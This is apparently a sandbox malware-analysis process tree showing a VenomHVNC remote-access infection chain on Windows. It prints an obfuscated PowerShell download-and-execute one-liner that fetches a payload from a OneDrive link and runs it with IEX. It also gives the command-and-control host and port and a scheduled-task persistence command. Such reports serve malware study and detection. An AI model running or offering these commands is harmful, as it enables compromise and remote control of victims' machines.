        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        27⤵
        
        PID:9596
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        28⤵
        
        PID:9620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        24⤵
        
        PID:7852
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        25⤵
        
        PID:7660
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        25⤵
        
        PID:7656
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        24⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        24⤵
        
        PID:7836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7748
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        26⤵
        
        PID:9764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        27⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6560
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        23⤵
        
        PID:7372
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        24⤵
        
        PID:1972
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        24⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        23⤵
        
        PID:1120
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        23⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7620
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        25⤵
        
        PID:8716
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        26⤵
        
        PID:7092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9872
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        22⤵
        
        PID:8020
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        23⤵
        
        PID:5824
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        23⤵
        
        PID:4316
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        23⤵
        
        PID:6104
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        23⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        22⤵
        
        PID:8076
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        22⤵
        
        PID:7100
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7940
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        24⤵
        
        PID:2688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        25⤵
        
        PID:8780
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9980
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        21⤵
        
        PID:7344
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        22⤵
        
        PID:7416
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        22⤵
        
        PID:7424
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        21⤵
        
        PID:7656
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        21⤵
        
        PID:8012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7992
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        23⤵
        
        PID:7000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        24⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6416
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        20⤵
        
        PID:2796
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        21⤵
        
        PID:6772
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        21⤵
        
        PID:6196
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6196 -s 1132
        22⤵
        Program crash
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        20⤵
        
        PID:7148
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        20⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7876
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        22⤵
        
        PID:7408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        23⤵
        
        PID:9160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        19⤵
        
        PID:5572
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        20⤵
        
        PID:6056
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        20⤵
        
        PID:5552
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        20⤵
        
        PID:3836
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        19⤵
        
        PID:7128
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        19⤵
        
        PID:2060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4328
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        21⤵
        
        PID:5668
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        22⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9504
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        18⤵
        
        PID:7028
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        19⤵
        
        PID:7144
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        19⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        18⤵
        
        PID:772
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        18⤵
        
        PID:6464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7052
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        20⤵
        
        PID:8608
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        21⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6952
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        17⤵
        
        PID:6384
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        18⤵
        
        PID:6424
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        18⤵
        
        PID:6436
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        17⤵
        
        PID:6636
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        17⤵
        
        PID:6952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6884
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        19⤵
        
        PID:5388
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        20⤵
        
        PID:8692
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8268
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        16⤵
        
        PID:1468
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        17⤵
        
        PID:5436
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        17⤵
        
        PID:5108
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        17⤵
        
        PID:3240
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        16⤵
        
        PID:6036
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        17⤵
        
        PID:868
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10864
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBD7A.tmp.bat""
        17⤵
        
        PID:9984
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        18⤵
        Delays execution with timeout.exe
        
        PID:9356
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        16⤵
        
        PID:6188
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5808
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        18⤵
        
        PID:7852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        19⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        15⤵
        
        PID:5512
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        16⤵
        
        PID:5360
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        16⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        15⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        15⤵
        
        PID:3836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6148
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        17⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        18⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        14⤵
        
        PID:5144
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        15⤵
        
        PID:2140
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        15⤵
        
        PID:1612
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        15⤵
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        14⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        14⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName(<#111#>'Microsoft.VisualBasic'<#111#>);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((<#111#>New-Object Net.WebClient),'Dow__lo--tri__g'.replace(<#111#>'__','n'<#111#>).replace(<#111#>'--','adS'<#111#>),[<#111#>Microsoft.VisualBasic.CallType<#111#>]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://onedrive.live.com/Download?cid=F839F9B0A').Replace('################','F0FDF18&resid=F839F9B0AF0FDF18%21134&authkey=APrNWHT3zGSCPD8'))|IEX;[Byte[]]
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2444
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\LED\ISO\Panel.vbs"
        16⤵
        
        PID:5404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\LED\ISO\Panel.bat" "
        17⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\LED\ISO\Panel.ps1
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8568
        
        C:\Users\Admin\AppData\Local\Temp\ClientH.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
        13⤵
        
        PID:5620
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        14⤵
        
        PID:5696
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        14⤵
        
        PID:5704
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC windows-services.linkpc.net 4448 waDQmvKdS.exe
        14⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\venom.exe
        
        "C:\Users\Admin\AppData\Local\Temp\venom.exe"
        13⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YFBRTYYQ97646.vbs"
        13⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
